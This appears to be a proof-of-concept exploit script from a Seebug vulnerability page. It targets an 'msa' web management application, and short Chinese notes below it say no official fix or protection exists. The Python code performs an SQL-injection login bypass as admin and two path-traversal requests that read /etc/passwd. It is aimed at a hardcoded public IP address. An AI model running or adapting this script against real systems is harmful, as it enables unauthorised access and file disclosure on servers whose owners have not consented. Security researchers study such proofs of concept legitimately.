#!/usr/bin/env python #coding=utf-8 import requests def login(): url = target + '/msa/main.xp' data = {'Fun':'msaAdminLogon', 'username': "admin' or'1'='1", 'password': '123456' } req = requests.post(url = url, data = data) print req.text def download(): url = target + '/msa/../../../../../../../../etc/passwd' req = requests.get(url = url) print req.text def download2(): url = target + '/msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=test.txt+downLoadFile=../etc/passwd' req = requests.get(url = url) print req.text if __name__ == '__main__': target = 'http://112.16.141.6' login() download() download2()
暂无官方解决方案
暂无防护方案
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论